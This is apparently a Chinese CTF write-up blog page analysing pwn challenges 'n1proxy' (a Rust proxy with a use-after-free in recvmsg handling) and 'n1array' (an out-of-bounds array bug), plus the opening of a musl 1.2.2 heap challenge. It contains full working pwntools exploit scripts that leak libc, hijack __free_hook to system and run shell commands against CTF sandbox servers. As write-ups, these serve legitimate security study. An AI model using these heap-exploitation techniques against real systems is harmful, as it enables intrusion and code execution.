分类 XCTF 下的文章

n1proxy

附件:https://pan.baidu.com/s/1JWEtWiyOmaJ4tzrVVXLZhA?pwd=ty6w (提取码:ty6w)

0x00 题目信息

we use safety rust to deploy a very safe proxy server!

Notice:the docker can't restart automatically for some reason, please close the docker and start a new one if you find some trouble

又是一个 Rust Pwn,比较巧的是比赛过程中获得了一血唯一解

0x01 题目分析

代码审计

  • 本题使用私有协议实现了一个支持 TCP, UDP, UNIX SOCK 三种底层协议的 proxy server,并且采用了 Rust 语言编码。源代码中多处使用 unsafe 代码块来直接调用 libc 中的函数;
  • main 函数起始处将 ptmalloc 中的 arena 数量设置为了 1,主要是为了简化在并发情况下堆利用的难度;

    • // make this easier :)
      unsafe {
          mallopt(libc::M_ARENA_MAX, 1);
      }
  • 主函数通过 handle_client 并行处理所有进入的连接;

    • thread::spawn(move || {
          println!("New client connected");
          handle_client(client_fd).unwrap_or_else(|err| {
              eprintln!("Error: {}", err);
              let err_msg = format!("error : {}", err);
              my_write(client_fd, err_msg.as_ptr() as *const c_void, err_msg.len()).ok();
          });
          unsafe { libc::close(client_fd) };
          println!("Client disconnected")
      });
  • handle_client 中主要通过 my_writemy_read 与客户端交互,并完成与客户端的密钥交换、会话密钥的协商,最后执行客户端指定的代理功能。需要注意的是,在一个会话中,只能调用一次代理功能的原语,整体的协议交互流程整理如下:

    • (handshake)
      server --> client | HELLO_MSG: "n1proxy server v0.1"
      client --> server | CLIENT_HELLO: "n1proxy client v0.1"
      client --> server | conn_type
      server --> client | key_exchange_sign, key_exchange
      client --> server | client_verify_len, client_verify
      client --> server | client_key_len, client_key_n
      client --> server | client_key_len, client_key_e
      server --> client | new_session_sign, new_session[E_cli(session_key), E_cli(time)]
      
      (new session)
      client --> server | E_sess(pre_conn[type_u32, status_u32, signature])
      server --> client | E_sess(ok_msg[ok_msg, key_exchange_sign])
      
      (connection operations)
      switch status:
      Listen:
          client --> server | E_sess(conn_data[host_len, host, port, signature])
          // new_unix_socket_listen(&target_host, target_port)
          server --> client | E_sess(resmsg[conn_fd, key_exchange_sign])
      
      Close:
          client --> server | E_sess(conn_data[fd, signature])
          // close(fd)
          server --> client | E_sess(resmsg[0, key_exchange_sign])
      
      Conn:
          client --> server | E_sess(conn_data[host_len, host, port, signature])
          // ProxyType::Tcp => my_connect(&target_host, target_port)?,
          // ProxyType::Udp => my_new_udp_connect(&target_host, target_port)?,
          // ProxyType::Sock => new_unix_socket_connect(&target_host, target_port)?,
          server --> client | E_sess(resmsg[conn_fd, key_exchange_sign])
      
      Recv:
          client --> server | E_sess(conn_data[fd, data_size_u64, signature])
          // TCP: my_read(fd, data, len);
          // ProxyType::Udp => my_recvfrom(target_fd, recv_data_size as usize)?,
          // ProxyType::Sock => my_recv_msg(target_fd, recv_data_size as usize)?,
          server --> client | E_sess(resmsg[data[recv_data_len, recv_data], key_exchange_sign])
      
      Send:
          client --> server | E_sess(conn_data[fd, data_size_u64, data, signature])
          // TCP: my_write(fd, data, len);
          // ProxyType::Udp => my_sendto(target_fd, &send_data)?,
          // ProxyType::Sock => my_send_msg(target_fd, &send_data)?,
          server --> client | E_sess(resmsg[send_res, key_exchange_sign])
    • handshake 部分会完成密钥的交换,并协商出一个 session_key,完成会话的初始化;
    • 会话建立后,new session 部分客户端先传递 typestatue 两个参数,type 用于指定代理所使用的协议类型,statue 决定使用什么功能原语;
    • connection operations 部分,按照 status 分发进入不同的原语中:

      • Listen:使用 unix:sock 在 /tmp/<hash_val> 目录下监听请求;
      • Close:关闭连接池中的指定 fd,并完成相应的资源释放;
      • Conn:指定 target_host:port 并使用 type 中指定的协议建立连接,并将 fd 加入连接池中;
      • Recv:指定连接池中的 fd 并使用 type 中指定的协议接收 data_size 大小的数据并返回;
      • Send:指定连接池中的 fd 并使用 type 中指定的协议发送 data_size 大小的数据并返回发送字节数。
  • 其它关键函数的实现请参考源代码。

漏洞点

漏洞位于指定 Recv 功能的 type 为 unix:sock 协议时所调用的 my_recv_msg 函数,但是该漏洞比较隐蔽,即使有一定 Rust 开发经验的人也会容易忽略(更何况我没有...)。

不过通过对比 my_send_msgmy_recv_msg 两个函数实现,再结合一定的分析还是能够看出端倪的:

#[inline(always)]
fn my_send_msg(fd: i32, msg: &[u8]) -> Result<isize> {
    let mut iov = vec![iovec {
        iov_base: msg.as_ptr() as *mut _,
        iov_len: msg.len(),
    }];
    let m = msghdr {
        msg_name: std::ptr::null_mut(),
        msg_namelen: 0,
        msg_iov: iov.as_mut_ptr(),
        msg_iovlen: iov.len(),
        msg_control: std::ptr::null_mut(),
        msg_controllen: 0,
        msg_flags: 0,
    };
    let send_res = unsafe { sendmsg(fd, &m, 0) };

    if send_res < 0 {
        return os_error!();
    }
    Ok(send_res)
}

#[inline(always)]
fn my_recv_msg(fd: i32, recv_size: usize) -> Result<Vec<u8>> {
    let mut recv_iov = [iovec {
        iov_base: vec![0u8; recv_size].as_mut_ptr() as *mut _,
        iov_len: recv_size,
    }];
    let mut msg = msghdr {
        msg_name: std::ptr::null_mut(),
        msg_namelen: 0,
        msg_iov: recv_iov.as_mut_ptr(),
        msg_iovlen: 1,
        msg_control: std::ptr::null_mut(),
        msg_controllen: 0,
        msg_flags: 0,
    };
    let recv_sz = unsafe { recvmsg(fd, &mut msg, 0) };
    if recv_sz < 0 {
        return os_error!();
    }

    let res = unsafe { slice::from_raw_parts(recv_iov[0].iov_base as *const u8, recv_size) };
    Ok(res.to_vec())
}
  • msghdr 是 Linux 下 sock 通信常用的一个结构体,其中较为关键的是 struct iovec * msg_iovint msg_iovlen,他们设置了待使用缓冲区的队列头和长度。而 iovec 结构体由 iov_baseiov_len 组成,前者保存的是缓冲区指针,后者保存缓冲区大小来避免越界;

    • #include<sys/socket.h>
      struct msghdr  {
          void* msg_name ;   
          socklen_t msg_namelen ;    
          struct iovec  * msg_iov ;   
          int  msg_iovlen ;   
          void  * msg_control ;  
          socklen_t msg_controllen ; 
          int  msg_flags ;  
      } ;
  • 回到这两个函数里面,my_send_msg 中, iov_base 设置的是 msg 的指针,msg 由上层函数申请并传入,其内容为客户端想要发送的数据;而 my_recv_msg 中,iov_base 通过 vec![0u8; recv_size].as_mut_ptr() as *mut _ 的方式初始化,这相当于在堆上开辟了一段 recv_size 大小的空间并转换为指针后赋值。这里有三个问题:

    • as_mut_ptr() 方法会返回 vector 第一个元素的裸指针,Rust 无法跟踪或管理裸指针的生命周期;
    • 同时,vec![0u8; recv_size] 在一个类似闭包的环境中申请,一旦出了对应的代码块就会被释放,而由于使用了裸指针来引用这块内存,并且最后所有引用 iov_base 的地方都位于 unsafe 代码块中,编译器完全无法正确追踪和检查此处的生命周期问题;
    • 最后一个问题,slice::from_raw_parts 的大小参数使用了用户指定的 recv_size,而不是 recvmsg 函数的返回值——即实际从 fd 中读出的数据大小 recv_sz。如果 recv_size 小于 recv_sziov_base 残留未初始化数据的话,这可能会导致这部分未初始化数据被当作正常读出的数据返回给客户端。
  • 所以 my_recv_msg 函数可以等价为:

    1. 使用一个 recv_size 大小的内存初始化 iov_base
    2. 释放这块内存得到悬空指针;
    3. unsafe { recvmsg(fd, &mut msg, 0) } 处从读取事先发送到指定 fd 上的数据并写入这块内存(UAF);
    4. 最后通过 unsafe { slice::from_raw_parts(recv_iov[0].iov_base as *const u8, recv_size) } 申请一个同样大小的内存,并把此时 recv_iov[0].iov_base 指针上的值拷贝到这块内存中。

0x02 利用思路

  • 因为漏洞点位于 my_recv_msg ,所以我们主要使用的功能原语是 unix:sock 协议下的 Send 和 Recv。为了使用这两个原语,还得先建立一个双工的管道。首先需要使用 Listen 功能监听一个 socket 文件,此时会话的线程会阻塞在 accept 的位置;然后在新进程中创建另一个会话调用 Conn 功能连接这个 socket 文件,此时会获得一个 fd,先前阻塞在 accept 的会话也会因为有新的连接请求而返回一个 fd。此时我们通过这两个 fd 就建立了一个双工管道,在管道的两端读写就可以分别调用 my_send_msgmy_recv_msg
  • 由上面的分析可以知道,iov_base 可以完成 UAF 的读和写,但是此时没有别的漏洞泄露地址,而在向客户端泄露值之前先要完成一次从 recvmsg 读出数据的写,此时如果不控制好写入的值会导致 crash。例如此时写入的是 tcache chunk 的 next 指针,当进行后续 malloc 操作的时候可能就会发生未知错误;
  • 奇妙的风水:由于 IDA 逆向没搞清楚到底要在哪下断点,于是就在 UAF 的前后直接查看堆的状态来风水。经过测试得到这么一个组合,当 Send 发送 8 个 \x00 ,且 Recv 接收 0x200 大小的数据时,会有较大概率泄露出一个较稳定的 libc 地址且不 crash:

    • image-20231026164134677
  • 题目使用的是 libc 2.27,所以第一时间考虑直接使用 tcache 覆写 __free_hook 的经典方法,但是具体怎么稳定地将值写上去折腾了老半天。因为 slice::from_raw_parts 的存在,在通过 UAF 覆盖 next 指针之后,程序会在同一个 bin 上申请相同大小的 chunk,并将 iov_base 指针处的值拷贝到其中。实际上如果将 next 覆盖为 __free_hook,那么 slice::from_raw_parts 直接申请到的就是 __free_hook 未知的内存。由于 iov_base 最开头保存的就是 next 指针的值,而 +0x8 的位置在重新 malloc 时会被清空,所以只能把要写入的值放在 +0x10 处,并将 next 指针修改为 __free_hook-0x10。这里还要将 tcache chunk + 0x8 的地方放一个可读可写的地址,来保证检查不出错(至于为什么不用控制为 heap+0x10 也没管太多,反正就是可以),最后再写 system 地址即可劫持 __free_hook 为 system;
  • 最后通过 Send 功能发送 b"cat /home/ctf/flag >&9\x00",并使用同样 0x50 的大小 Recv 接收,即可将 flag 写出到响应给客户端的数据流中。

    • image-20231026170145854

0x03 一些坑

  • Send 功能中,由于题目代码实现的原因,data 和 sig 如果拼接在一起发送的话会导致线程阻塞,也就是认为没有读完;如果分开发送的话,则对 data 有最小长度为 20 个字节的要求,这显然容易破坏一些想要的值;所以采取的方案是拼接 data 和 sig,但是留末尾两个字节分开发送,由于 session_key 使用带有 padding 的块密码加密数据,所以服务端是可以正常读出的,这样就可以保证 data 最短可发送 1 个字节,且不会一直阻塞。

0x04 EXP

from pwnlib.tubes.remote import remote
from pwnlib.util.packing import p8, p16, p32, p64, u8, u16, u32, u64
import pwnlib.log as log
from pwn import *
import rsa
from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5, AES
from Crypto.Util.Padding import pad, unpad
from enum import Enum
import threading
import time

context.log_level = "debug"

class ConnType(Enum):
    New = 0
    Restore = 1
    Renew = 2
    Restart = 114514
    Unknown = 3

class ProxyType(Enum):
    Tcp = 0
    Udp = 1
    Sock = 2
    Unknown = 3

class ProxyStatus(Enum):
    Send = 0
    Recv = 1
    Conn = 2
    Close = 3
    Listen = 4
    Unknown = 5

class Client(object):
    def __init__(self):
        self.server_key = None
        
        if os.path.exists("client_key.pem"):
            with open("client_key.pem", "rb") as f:
                self.client_key = RSA.import_key(f.read())
        else:
            self.client_key = RSA.generate(1024)
            self.client_key.has_private()
            with open("client_key.pem", "wb") as f:
                f.write(self.client_key.export_key())

        self.r = remote("chall-4a4554644c7a5349.sandbox.ctfpunk.com", 21496)

        self.state = 0
        self.session_key = ()

    def rsa_decrypt(self, data: bytes) -> bytes:
        if not self.client_key.has_private():
            raise Exception("No private key")
        
        cipher = PKCS1_v1_5.new(self.client_key)
        decrypted = cipher.decrypt(data, None)
        return decrypted

    def rsa_encrypt(self, data: bytes):
        pass

    def aes_encrypt(self, data: bytes) -> bytes:
        key, iv = self.session_key
        cipher = AES.new(key, AES.MODE_CBC, iv)
        encrypted_data = cipher.encrypt(pad(data, AES.block_size))
        return encrypted_data

    def aes_decrypt(self, data: bytes):
        key, iv = self.session_key
        cipher = AES.new(key, AES.MODE_CBC, iv)
        try:
            decrypted_data = unpad(cipher.decrypt(data), AES.block_size)
            return decrypted_data
        except ValueError:
            raise Exception("Invalid padding")

    def send_client_hello(self):
        self.r.recvuntil("n1proxy server v0.1")
        self.r.send("n1proxy client v0.1")

    def send_conn_type(self, type):
        """
        enum ConnType {
            New = 0,
            Restore = 1,
            Renew = 2,
            Restart = 114514,
            Unknown = 3,
        }
        """
        self.r.send(p32(type))

    def verify(self, data: bytes, signature: bytes):
        """
        verify signature from server
        """
        assert self.server_key is not None
        hash_obj = SHA256.new(data)
        verifier = pkcs1_15.new(self.server_key)
        try:
            verifier.verify(hash_obj, signature)
            log.success("Verify server key success")
        except (ValueError, TypeError):
            raise Exception("Invalid server key")

    def sign(self, data: bytes):
        """
        sign data with client private key
        """
        assert self.client_key.has_private()
        signer = pkcs1_15.new(self.client_key)
        hash_obj = SHA256.new(data)
        signature = signer.sign(hash_obj)
        return signature

    def get_server_pubkey(self):
        # key_exchange_sign ->
        # [ len(key_exchange_sign) (8 bytes) | key_exchange_sign (512 bytes) ]
        key_exchange_sign_total = 520
        buf = self.r.recv(key_exchange_sign_total)
        key_exchange_sign_length = u64(buf[:8])
        key_exchange_sign = buf[8:]
        assert(len(key_exchange_sign) == key_exchange_sign_length)

        # key exchange ->
        # [ sizeof(pubkey_n) (8 bytes) | sizeof(pubkey_e) (8 bytes) | pubkey_n (512 bytes) | pubkey_e (3 bytes)]
        key_exchange_total = 531
        key_exchange_buf = self.r.recv(key_exchange_total)
        pubkey_n_length = u64(key_exchange_buf[:8])
        pubkey_e_length = u64(key_exchange_buf[8:16])
        pubkey_n = key_exchange_buf[16:528]
        pubkey_e = key_exchange_buf[528:]
        assert len(pubkey_n) == pubkey_n_length
        assert len(pubkey_e) == pubkey_e_length

        log.info("key_exchange_sign_length: " + str(key_exchange_sign_length))

        pubkey_n = int.from_bytes(pubkey_n, "big")
        pubkey_e = int.from_bytes(pubkey_e, "big")
        
        if self.server_key is None:
            self.server_key = RSA.construct((pubkey_n, pubkey_e))
            self.verify(key_exchange_buf, key_exchange_sign)

        log.success("pubkey_n: " + str(pubkey_n))
        log.success("pubkey_e: " + str(pubkey_e))

    def send_client_pubkey(self):
        """
        * client_msg_len is 8bytes
        """
        data_to_sign = len(self.client_key.n.to_bytes(512, 'big')).to_bytes(8, 'little') + \
                        self.client_key.n.to_bytes(512, 'big') + \
                        len(self.client_key.e.to_bytes(3, 'big')).to_bytes(8, 'little') + \
                        self.client_key.e.to_bytes(3, 'big')
        
        signature = self.sign(data_to_sign)

        packet = len(signature).to_bytes(8, 'little') + signature + data_to_sign
        self.r.send(packet)

    def get_session_key(self):
        """
        session_key_sign [ len(sign) (8 bytes) | sign (512 bytes) ]
        session_key [ len(enc_key) (8 bytes) | enc_key (128 key) | len(enc_time) (8 bytes) | enc_time (128 bytes) ]
        """
        session_key_sign_total = 520
        session_key_sign_buf = self.r.recv(session_key_sign_total)
        session_key_sign_length = u64(session_key_sign_buf[:8])
        session_key_sign = session_key_sign_buf[8:]

        session_key_total = 272
        session_key_buf = self.r.recv(session_key_total)
        enc_key_length = u64(session_key_buf[:8])
        enc_key = session_key_buf[8:136]
        enc_time_length = u64(session_key_buf[136:144])
        enc_time = session_key_buf[144:272]

        assert len(session_key_sign) == session_key_sign_length
        self.verify(session_key_buf, session_key_sign)

        assert len(enc_key) == enc_key_length
        assert len(enc_time) == enc_time_length

        log.info("enc_key_length: " + str(enc_key_length))
        log.info("enc_time_length: " + str(enc_time_length))

        session_key = self.rsa_decrypt(enc_key)
        time_stamp = self.rsa_decrypt(enc_time)
        time_stamp = int.from_bytes(time_stamp, 'big')

        assert len(session_key) == 48
        key = session_key[:32]
        iv = session_key[32:]
        assert len(key) == 32
        assert len(iv) == 16
        self.session_key = (key, iv)

    def recv_ok_msg(self):
        enc_data_len = 528
        enc_data = self.r.recv(enc_data_len)
        data = self.aes_decrypt(enc_data)
        assert len(data) == 524
        ok_msg = data[:4]
        sign_len = u64(data[4:12])
        sign = data[12:]
        assert len(sign) == sign_len
        assert len(sign) == 512
        self.verify(ok_msg, sign)
        log.success(f"recv ok msg : {ok_msg}")

    
    def send_pre_conn(self, proxy_type, proxy_status):
        data = p32(proxy_type) + p32(proxy_status)
        sig = self.sign(data)
        full = data + sig
        enc_data = self.aes_encrypt(full)

        self.r.send(enc_data)

    def proxy_listen(self, hostlen, host, port):
        self.send_pre_conn(ProxyType.Sock.value, ProxyStatus.Listen.value)
        self.recv_ok_msg()
        
        assert len(host) == hostlen
        
        hostlen = p32(hostlen)
        host = host.encode()
        port = p16(port)
        data = hostlen + host + port
        sig = self.sign(data)
        full = data + sig
        enc_data = self.aes_encrypt(full)
        
        self.r.send(enc_data)

        # server's listen thread will block because of waiting accept
        # recv conn fd
        recv_enc_data_len = 528
        recv_enc_data = self.r.recv(recv_enc_data_len)
        recv_data = self.aes_decrypt(recv_enc_data)
        assert len(recv_data) == 516
        sig = recv_data[4:]
        self.verify(recv_data[:4], sig)
        conn_fd = u32(recv_data[:4])

        log.success(f"recv listen fd: {conn_fd}")
        return conn_fd

    def proxy_conn(self, hostlen, host, port) -> int:
        self.send_pre_conn(ProxyType.Sock.value, ProxyStatus.Conn.value)
        self.recv_ok_msg()

        hostlen = p32(hostlen)
        host = host.encode()
        port = p16(port)
        data = hostlen + host + port
        sig = self.sign(data)
        full = data + sig
        enc_data = self.aes_encrypt(full)
        
        self.r.send(enc_data)

        # recv conn fd
        recv_enc_data_len = 528
        recv_enc_data = self.r.recv(recv_enc_data_len)
        recv_data = self.aes_decrypt(recv_enc_data)
        assert len(recv_data) == 516
        sig = recv_data[4:]
        self.verify(recv_data[:4], sig)
        conn_fd = u32(recv_data[:4])

        log.success(f"recv conn fd: {conn_fd}")
        return conn_fd
    
    def proxy_send(self, conn_fd, data_size_u64, data):
        self.send_pre_conn(ProxyType.Sock.value, ProxyStatus.Send.value)
        self.recv_ok_msg()

        assert len(data) == data_size_u64

        conn_fd = p32(conn_fd)
        data_size_u64 = p64(data_size_u64)
        data = conn_fd + data_size_u64 + data
        sig = self.sign(data)
        #full = data + sig
        #enc_data = self.aes_encrypt(full)
        #self.r.send(enc_data)
        self.r.send(self.aes_encrypt(data+sig[:-2]))
        self.r.send(self.aes_encrypt(sig[-2:]))

        # recv send result
        recv_enc_data_len = 528
        recv_enc_data = self.r.recv(recv_enc_data_len)
        recv_data = self.aes_decrypt(recv_enc_data)
        sig = recv_data[8:]
        self.verify(recv_data[:8], sig)
        send_res = u64(recv_data[:8])

        log.success(f"send_res: {send_res}")
        return send_res

    def proxy_recv(self, conn_fd, data_size_u64):
        self.send_pre_conn(ProxyType.Sock.value, ProxyStatus.Recv.value)
        self.recv_ok_msg()

        conn_fd = p32(conn_fd)
        data_size_u64 = p64(data_size_u64)
        data = conn_fd + data_size_u64
        sig = self.sign(data)
        self.r.send(self.aes_encrypt(data+sig))

        recv_enc_data = self.r.recv()
        recv_data = self.aes_decrypt(recv_enc_data)
        data_len = u64(recv_data[:8])
        data = recv_data[8:8+data_len]
        sig = recv_data[8+data_len:]
        self.verify(recv_data[:8+data_len], sig)
        log.success(f"recv_data: {data}")

        return data

    def handshake(self):
        self.send_client_hello()
        self.send_conn_type(0x0)
        self.get_server_pubkey()
        self.send_client_pubkey()
        self.get_session_key()

    def do_close(self):
        self.r.close()

fd_1 = -1
fd_2 = -1

def listen_task():
    global fd_1
    c = Client()
    c.handshake()
    fd = c.proxy_listen(0x8, "hostname", 1213)
    fd_1 = fd
    c.do_close()

def exp():
    global fd_1
    global fd_2

    libc = ELF("./lib/libc.so.6")

    threading.Thread(target=listen_task).start()
    time.sleep(2)

    c1 = Client()
    c1.handshake()
    fd_2 = c1.proxy_conn(0x8, "hostname", 1213)
    c1.do_close()

    print(f"fd_1: {fd_1}, fd_2: {fd_2}")

    c2 = Client()
    c2.handshake()
    c2.proxy_send(fd_2, 0x8, b"\x00"*0x8)
    c2.do_close()

# 0x5555556b4010
# 0x200 -> 0x7ffff758ac00
# 0x450 -> 0x7ffff758b290
# 0x410 -> 0x7ffff758b0b0 | 0x5555556cb660
    #pause()
    c3 = Client()
    c3.handshake()
    leak_data = c3.proxy_recv(fd_1, 0x200)

    tmp_leak = u64(leak_data[:0x8])
    libc_leak = u64(leak_data[0x8:0x10])
    libc_base = libc_leak - 0x3ebca0
    system = libc_base + libc.symbols['system']
    __free_hook = libc_base + libc.symbols['__free_hook']
    binsh = libc_base + next(libc.search(b"/bin/sh\x00"))
    print("tmp_leak:", hex(tmp_leak))
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("__free_hook:", hex(__free_hook))
    print("binsh:", hex(binsh))
    c3.do_close()

    #pause()
    c4 = Client()
    c4.handshake()
    c4.proxy_send(fd_2, 0x18, p64(__free_hook-0x10)+p64(__free_hook-0x20)+p64(system))
    c4.do_close()
    c5 = Client()
    c5.handshake()
    read_data = c5.proxy_recv(fd_1, 0x50)
    print("read_data:", read_data)
    c5.do_close()

    c6 = Client()
    c6.handshake()
    cmd = b"cat /home/ctf/flag >&9\x00"
    c6.proxy_send(fd_2, len(cmd), cmd)
    c6.do_close()
    c7 = Client()
    c7.handshake()
    read_data = c7.proxy_recv(fd_1, 0x50)
    print("read_data:", read_data)
    c7.do_close() 

if __name__ == "__main__":
    exp()

n1array

0x00 题目分析

挺简单的,主要的工作量在于数据结构的逆向,但是居然能抢个一血...
  • 题目大体维护了一个hash表,每个表项对应一个array。每个array有一个 name 用于索引,有一个 type 数组和 value 数组。理论上这两个数组应该等长。
  • 用户在输入的时候,可以输入三种 Atom(name,type,value),顺序不限,次数不限,理论上后输入的会覆盖前输入的,每种 Atom 的结构如下:

    • value atom: | u32 len | u32 type | u32 is_def | u32 default_val | u32 nelts | u32 values * nelts |
      
      type atom : | u32 len | u32 type | u32 nelts | u8 type * nelts |
      
      name atom : | u32 len | u32 type | u32 name_len | char[name_len] name |
  • value 有两种模式,在输入的时候可以选择:

    • 正常数组,用户自己输入每一位的值;
    • default数组,用一个输入的位(记为 is_def)来标记,如果置位,则认为这个数组的所有值都是用户输入的 default 值。且用户无需在后面输入每一位的值,即这个输入占空间很短。
  • parse_value() 中,当先输入一个正常的 value 数组(记为value1),再输入一个 default 数组(记为value2),可以发现,array->value.buf 指向第一个输入的 value1_atom.buf ,但是 array->num 会被置为第二个输入的 value1_atom.nelts ,这就导致了越界读写的风险;

    • image-20231026171538942
    • image-20231026171612347
  • 那么题目就简单了,首先通过溢出读,利用 unsorted_bin 来泄露libc地址,然后是溢出写来劫持 tcache 控制 __free_hook。由于读写地址只能在不对齐的 4 字节中进行,所以需要额外处理一下。

0x01 EXP

from pwn import *

context.log_level = "debug"

#p = process(["./ld-2.31.so", "--preload", "./libc-2.31.so", "./pwn"])
p = remote("chall-6b73445766645053.sandbox.ctfpunk.com", 22258)
libc = ELF("./libc-2.31.so")
#p = process(["./pwn"])

def value_atom(nelts, value:list, is_def=False, def_val=0xdeadbeef):
    # len | type | is_def | def_val | nelts | value
    value_data = b"".join([p32(i) for i in value])
    tmp = p32(1) + p32(1 if is_def else 0) + p32(def_val) + p32(nelts) + value_data
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

def type_atom(nelts, type:list):
    # len | type | nelts | type
    type_data = b"".join([p8(_t) for _t in type])
    tmp = p32(2) + p32(nelts) + type_data
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

def name_atom(name:bytes):
    # len | type | name_len | name
    tmp = p32(3) + p32(len(name)) + name
    tmp = p32(4 + len(tmp)) + tmp
    return tmp

def input_data(atom_data:bytes):
    p.sendlineafter(b"cmd>>", b"0")
    p.recvuntil(b"input data of array atom>>")
    atom_data = p32(0) + atom_data
    p.send(p32(4 + len(atom_data)))
    p.send(atom_data)
    
def print_array(arr_name):
    p.sendlineafter(b"cmd>>", b"1")
    p.recvuntil(b"input name>>")
    p.sendline(arr_name)
    
def remove(arr_name):
    p.sendlineafter(b"cmd>>", b"2")
    p.recvuntil(b"input name>>")
    p.sendline(arr_name)

def edit_value(arr_name, idx, new_val):
    p.sendlineafter(b"cmd>>", b"3")
    p.recvuntil(b"input name>>")
    p.sendline(arr_name)
    p.recvuntil(b"Input Index: \n")
    p.sendline(str(idx).encode())
    p.recvuntil(b"Input New Val: \n")
    p.sendline(str(new_val).encode())
    
def edit_type(arr_name, idx, new_type):
    p.sendlineafter(b"cmd>>", b"4")
    p.recvuntil(b"input name>>")
    p.sendline(arr_name)
    p.recvuntil(b"Input Index: \n")
    p.sendline(str(idx).encode())
    p.recvuntil(b"Input New Type: \n")
    p.sendline(str(new_type).encode())
    
def add(arr_name, idx1, idx2):
    p.sendlineafter(b"cmd>>", b"5")
    p.recvuntil(b"input name>>")
    p.sendline(arr_name)
    p.recvuntil(b"Input Index1: \n")
    p.sendline(str(idx1).encode())
    p.recvuntil(b"Input Index1: \n")
    p.sendline(str(idx2).encode())

# 0x555555554000+0x5030
# 0x000055555555a2a0

def exp():
    #gdb.attach(p, "b *0x7ffff7fc3000+0x16A4\nc\n")
    paylaod = type_atom(256, [2]*256) + name_atom(b"AAAA\x00") + value_atom(1, [0xabcd]) + value_atom(256, [], True, 0xdeadbeef)
    input_data(paylaod)

    paylaod = type_atom(256, [2]*256) + name_atom(b"BBBB\x00") + value_atom(256, [0xaaaa]*256)
    input_data(paylaod)
    remove(b"BBBB")

    print_array(b"AAAA")

    p.recvuntil(b"array AAAA: ")
    arr_data = p.recvuntil(b"]")
    arr_data = arr_data.replace(b" ", b",").decode()
    arr = eval(arr_data)
    print("get arr: ", arr)
    #print(hex(arr[13]))
    #print(hex(arr[12]))
    #print(hex(arr[11]))
    heap_leak = ((arr[13] & 0xff) << 8*5) | (arr[12] << 8) | ((arr[11] & 0xff000000) >> 8*3)
    libc_leak = ((arr[47] & 0xff) << 8*5) | (arr[46] << 8) | ((arr[45] & 0xff000000) >> 8*3)
    print("heap_leak:", hex(heap_leak))
    print("libc_leak:", hex(libc_leak))
    libc_base = libc_leak - 0x1ecbe0
    system = libc_base + libc.sym["system"]
    free_hook = libc_base + libc.sym["__free_hook"]
    binsh = libc_base + next(libc.search(b"/bin/sh"))
    print("libc_base:", hex(libc_base))
    print("free_hook:", hex(free_hook))

    paylaod = type_atom(1, [2]*1) + name_atom(b"CCCC\x00") + value_atom(1, [0xaaaa]*1)
    input_data(paylaod)
    paylaod = type_atom(1, [2]*1) + name_atom(b"DDDD\x00") + value_atom(1, [0xaaaa]*1)
    input_data(paylaod)
    remove(b"CCCC")
    remove(b"DDDD")

    print_array(b"AAAA")
    p.recvuntil(b"array AAAA: ")
    arr_data = p.recvuntil(b"]")
    arr_data = arr_data.replace(b" ", b",").decode()
    arr = eval(arr_data)
    print("get arr: ", arr)
    part1 = arr[105]
    part2 = arr[106]
    part3 = arr[107]
    print("part1:", hex(part1))
    print("part2:", hex(part2))
    print("part3:", hex(part3))
    tmp_hook = free_hook-8
    w_part1 = (part1 & 0x00ffffff) | ((tmp_hook & 0xff) << 8*3)
    w_part2 = (tmp_hook & 0x00ffffffff00) >> 8
    w_part3 = (part3 & 0xffffff00) | ((tmp_hook & 0xff0000000000) >> 8*5)
    print("w_part1:", hex(w_part1))
    print("w_part2:", hex(w_part2))
    print("w_part3:", hex(w_part3))
    edit_value(b"AAAA", 105, w_part1)
    edit_value(b"AAAA", 106, w_part2)
    edit_value(b"AAAA", 107, w_part3)

    paylaod = type_atom(1, [2]*1) + name_atom(b"/bin/sh;"+p64(system)) + value_atom(1, [0xaaaa]*1)
    input_data(paylaod)
    #paylaod = type_atom(1, [2]*1) + name_atom(p64(system)) + value_atom(1, [0xaaaa]*1)
    #input_data(paylaod)

    print("free_hook:", hex(free_hook))

    remove(b"/bin/sh;"+p64(system))

    #gdb.attach(p)
    p.interactive()

if __name__ == "__main__":
    exp()

前言

不算很复杂的musl堆题,但是用了musl 1.2.2。相比于musl 1.1.x中使用的以链表为主的类似dlmalloc的内存管理器,musl 1.2.2则采用了:malloc_context->meta_arena->meta->gropu (chunks)这样的多级结构,并且free掉的chunk有bitmap直接管理(而不是放入某些链表中)。但是meta依然存在无检查的unlink操作,所以大部分攻击的思路仍然是构造出fake meta,然后触发dequeue条件完成任意地址写一个指针。做到任意地址写之后的思路就比较多了:

  • 可以尝试写rop到栈上
  • 可以尝试伪造 fake stdout 并将指针写到 stdout_usedfake stdout 的头部可以写为"/bin/sh\x00"write指针写为 system 指针,这样当 exit() 时就会触发system("/bin/sh")调用
  • 可以参考别的博主写 _aexit() 中相关函数指针的方法

思路:

  • 堆风水+UAF把一个note构造到另一个note的note->content域下,find功能泄露出elf_base和初始堆地址(musl的初始堆地址在二进制文件的地址空间中)
  • 再用一种堆风水思路借助UAF构造fake note占用掉发生UAF的原note,构造指针进行任意地址泄露,重复该步骤两次分别泄露libc地址和__malloc+context中的secret(用于后序步骤伪造)
  • 同样借助UAF构造一个fake note,并从一个页对齐的位置顺序构造fake_arena | fake_meta | fake_group | fake_chunk | fake IO_FILE,fake note的next指向fake_chunk然后构造fake_metaprevnext使得freefake_note->next之后的unlinkfake IO_FILE的地址写入到stdout_user

    • 由于__IO_FILE中存在如下指针:size_t (*write)(FILE *, const unsigned char *, size_t);,只要控制好参数和指针就可以进行execve("/bin/sh", NULL, NULL)来getshell
    • 详细的实现细节可以参考[2]中的描述

Notice:

  1. 为了保证和远程环境最大程度相似,建议在调试前cp ./libc.so /usr/lib/x86_64-linux-musl/libc.so,如果怕覆盖掉本地的musl可以先mv备份
  2. 开启和关闭ASLR会导致某个常量发生变化,调试的时候记得手动修改一下(见注释)
  3. 为了方便调试,可以下载一份musl-1.2.2源码然后用dir ./musl-1.2.2/src/mallocdir ./musl-1.2.2/src/malloc/mallocng加载malloc相关的调试符号(在free的时候带源码调试可以很方便检查程序流卡在哪个assert)

EXP:

from pwn import *

context.log_level = "debug"
# 调试本地环境记得一定要拷贝到这个路径,用ld的启动方式vmmap会很tm怪!
# cp ./libc.so /usr/lib/x86_64-linux-musl/libc.so
p = process("./babynote")
